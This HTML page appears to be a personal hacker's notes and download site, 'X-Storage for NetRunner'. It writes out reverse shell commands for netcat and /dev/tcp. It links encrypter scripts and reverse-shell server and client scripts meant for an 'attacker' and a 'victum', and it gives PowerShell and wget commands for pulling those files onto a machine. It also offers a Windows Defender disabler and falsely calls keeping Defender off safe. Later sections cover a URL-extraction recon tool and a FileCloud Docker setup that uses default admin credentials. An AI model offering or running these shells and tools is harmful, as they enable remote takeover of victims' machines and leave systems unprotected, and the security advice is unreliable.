<!DOCTYPE html>
<html lang ="en">
<html> 
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>X-Storage</title>
        <link rel="stylesheet" href = "/storage/files/main.css">
    </head>   
    <body>
        <div class="filter">
        </div>
        <header><h1>X-Storage for NetRunner</h1></header></header><br>
        <h2>Reverse shell from linux(kali) to windows</h2><br>
        <p><b>host:</b> nc -lnvp [port]</p>
        <p><b>client:</b>[windows] ncat [host ip] [port] -e cmd.exe</p>
        <p><b>client:</b>[linux]sh -i >& /dev/tcp/[host ip]/[port] 0>&1</p>
        <br><h4><em>Requirements:</em></h4><br>
        <table>
            <tr>
                <th>No.</th>
                <th>Name</th>
                <th>Type</th>
                <th>Link</th>
                <th>Comment</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>NetCat</td>
                <td>website</td>
                <td><a href="https://nmap.org/download.html">Netcat</a></td>
                <td>Try to add it to environment variables</td>
            </tr>
        </table>
        <p style ="line-height: 600%;">&#8205;</p>
        <h2>backup files</h2><br><br>
        <p>Important codes/files to finish in the future</p>
        <p>I have tried the encrypted codes only in kali Linux for now so I am not sure if they would work as intended in other operating systems</p></p><br><br>
        <table>
            <tr>
                <th>No.</th>
                <th>Name</th>
                <th>Type</th>
                <th>Link</th>
                <th>Comment</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>encrypter1</td>
                <td>python</td>
                <td><a href="/storage/files/encrypter.py" download = "" class ="download-btn">encrypter1</a></td>
                <td>Code which was made for the first time</td>
            </tr>
            <tr>
                <td>2.</td>
                <td>encrypter2</td>
                <td>python</td>
                <td><a href="/storage/files/encrypter2.0.py" download = "" class ="download-btn">encrypter2</a></td>
                <td>Working but it is not perfect, but has the features I want to add </td>
            </tr>
            <tr>
                <td>3.</td>
                <td>decrypter</td>
                <td>python</td>
                <td><a href="/storage/files/decrypter.py" download = "" class ="download-btn">decrypter</a></td>
                <td>basic decrypter</td>
            </tr>
            <tr>
                <td>4.</td>
                <td>Reverse_server</td>
                <td>python</td>
                <td><a href ="/storage/files/server.py" download ="" class="download-btn">server</a></td>
                <td>Reverse shell for attacker || If you are launching this attack you would need to know your ip. This is why use Get-NetIPAddress in powershell or ifconfig on linux</td>
            </tr>
            <tr>
                <td>5.</td>
                <td>Reverse_client</td>
                <td>python</td>
                <td><a href = "/storage/files/server.py" download = "" class="download-btn">client</a></td>
                <td>Revere shell for victum[ONLY USE THIS IF THE CLIENT IS RUNNING A WINDOWS OS] || Only downside is you need to have the packages imported into their system </td>
            </tr>
            <tr>
                <Td>6.</Td>
                <td>Bloatware remover for windows</td>
                <td>compressed file(zip)</td>
                <Td><a href = "/storage/files/BloatynosyApp.zip" download = "" class="download-btn">bloaty</a></Td>
                <td>Gives you the authority to remove unwanted apps and plugins in Windows the GitHub pages to this:https://github.com/builtbybel/Winpilot/releases/tag/1.5.0</td>
            </tr>
            <tr>
                <td>7.</td>
                <td>Windows defender manager</td>
                <td>compressed file(zip)</td>
                <td><a href = "/storage/files/dControl.zip" download = "" class="download-btn">dControler</a></td>
                <td>Help you disable or enable Defender, It is safe always have it turned off for best performance</td>
            </tr>
        </table>
        <p style ="line-height: 2700%;">&#8205;</p>
        <h2>Downloading a file using powershell</h2><br><br>
        <p>First fix variables for easier access : $u , $p</p><br>
        <p>$u="https://x-netrunner.github.io/storage/files/encrypter.py"</p><br>
        <p>$p="C:/test.py"</p><br>
        <p>Now you have 3 ways to download the file :</p><br><br>
        <table>
            <tr>
                <th>No.</th>
                <th>Method</th>
                <th>Url</th>
                <th>Destination</th>
                <th>Comment</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>Invoke-Webrequest -URI $u -Outfile $p</td>
                <td>$u</td>
                <td>$p</td>
                <td>mosty used </td>
            </tr>
            <tr>
                <td>2.</td>
                <td>(New-Object System.Net.WebClient).DownloadFile ($u, $p)</td>
                <td>$u</td>
                <td>$p</td>
                <td>If your goal is to download a file, you will need to create a System.Net.WebClient object. When you create this object, you must call the DownloadFile method and provide values for the URL and for the output path.</td>
            </tr>
            <tr>
                <td>3.</td>
                <td>tart-BitsTransfer -Source $u -Destination $p</td>
                <td>$u</td>
                <td>$p</td>
                <td>BITS refers to the Background Intelligent Transfer Service. This service is a part of the Windows operating system, and you must have BITS enabled for this technique to work.</td>
            </tr>
        </table>
        <p style ="line-height: 1900%;">&#8205;</p>
        <h2>Downloading a file using linux</h2><br><br>
        <p>This is very common ofc it's very simple as well you need to use wget for this</p><br>
        <b><p><em>EXAMPLE:</em></b> wget https://x-netrunner.github.io/storage/files/client.py</p>
        <H2 style ="line-height: 500%;">Viewing a website details</H2>
        <p>Use wsl or virtual machine of Kali or any Linux distro for this </p>
        <br><h4><em>Requirements:</em></h4><br>
        <table>
            <tr>
                <th>No.</th>
                <th>steps</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>you would need to git clone https://github.com/eschultze/URLextractor.git</td>
            </tr>
            <tr>
                <td>2.</td>
                <td>cd into the created directory</td>
            </tr>
            <tr>
                <td>3.</td>
                <td>make sure to download the requirements from the file</td>
            </tr>
            <tr>
                <td>4.</td>
                <td>run ./extractor.sh to download the tool</td>
            </tr>
            <tr>
                <Td>5.</Td>
                <td>./extractor.sh [website name ] for example ./extractor.sh https://x-netrunne.github.io/storage/</td>
            </tr>
        </table>
        <p style ="line-height: 1500%;">&#8205;</p>
        <h2>Localhost drive</h2>
        <p>I am not sure how to make it public but for localhost, I am using filecloud</p><br>
        <h4><em>steps:</em></h4>
        <table>
            <tr>
                <th>No.</th>
                <th>steps</th>
                <th>comments</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>Install wsl of linux[one way to do it other ways are on the website]</td>
                <td>Wsl was easier to do as it's on the same terminal but for the other steps visit <a href ="https://www.filecloud.com">filecloud</a></td>
            </tr>
            <tr>
                <td>2.</td>
                <td>Install docker by using sudo apt install docker.io docker-compose -y</td>
                <td>docker is very important as it is the tool we will use to host it ig</td>
            </tr>
            <tr>
                <td>3.</td>
                <td>wget https://patch.codelathe.com/tonidocloud/live/scripts/fc/docker-compose.yml</td>
                <td>simpluy installs dockers yml file</td>
            </tr>
            <tr>
                <Td>4.</Td>
                <td>docker-compose up -d filecloud.server filecloud.mongodb</td>
                <td> This will set up the server this might take a while </td>
            </tr>
            <tr>
                <td>5.</td>
                <td>type in https://[ip address]/install || then https://[ip address]/admin</td>
                <td> The first link will let you see if everything is working fine and the second link is to the cloud as admin to set it up[user:admin password:password]</td>
            </tr>
            <tr>
                <td>6.</td>
                <td> Head over to the website <a href ="https://www.filecloud.com">filecloud</a> go to installation of docker and get the license txt file</td>
                <td> This will let you use the cloud locally</td>
            </tr>
        </table>
        <p style ="line-height: 2500%;">&#8205;</p>
        <p> That's it we are done!! if you want to know more about this head over to network chucks vid</p>
        <h4 style ="line-height: 400%;">Additional steps if you want to </h4>
        <table>
            <tr>
                <th>No.</th>
                <th>Steps</th>
                <th>comment</th>
            </tr>
            <tr>
                <td>1.</td>
                <td>sudo docker pull filecloud/fileclouddocker:23.232.1</td>
                <td>pulls the docker image, this is around 1 GB </td>
            </tr>
            <tr>
                <td>2.</td>
                <td>sudo docker run --privileged -d -p 443:443 -p 80:80 -v fcdata:/opt/fileclouddata -v dbdata:/var/lib/mongodb -v solrdata:/opt/solrfcdata/var/solr -v htmldata:/var/www/html --name [yourcontainername] [current_image_name:tag] /lib/systemd/systemd</td>
                <td> This allows you access to the website image is fileclould/fileclouddocker, this step might take you a while </td>
            </tr>
            <tr>
                <td>3.</td>
                <td>http://[hostip]/ui/admin/index.html</td>
                <td>head over to the link same password and username</td>
            </tr>
            <tr>
                <td>4.</td>
                <td> In the website go to Settings > Storage > My Files and set Storage Path to /opt/fileclouddata.</td>
                <td> If you are interested in the preview and all go to <a href = "https://www.filecloud.com/supportdocs/fcdoc/latest/server/filecloud-administrator-guide/installing-filecloud-server/installation/filecloud-docker-installation">filecloud docker doc</a></td>
            </tr>
        </table>
        <p style ="line-height: 1900%;">&#8205;</p>
        <p>Once installed you can run this command to start the website again  <b><em>sudo docker-compose up -d filecloud.server filecloud.mongodb</b><em></em></p><br>
        <p>Then use <b><em>sudo docker ps</em></b> to check if its running and got to the website</p>


        
        <p style ="line-height: 1000%;">&#8205;</p>
        <div class = "wrapper"><script src="https://static.elfsight.com/platform/platform.js" data-use-service-core defer></script>
        <div class="elfsight-app-d82d2423-5c88-4c6b-a63e-24c839109a0d" data-elfsight-app-lazy></div></div>
    </body>
</html>
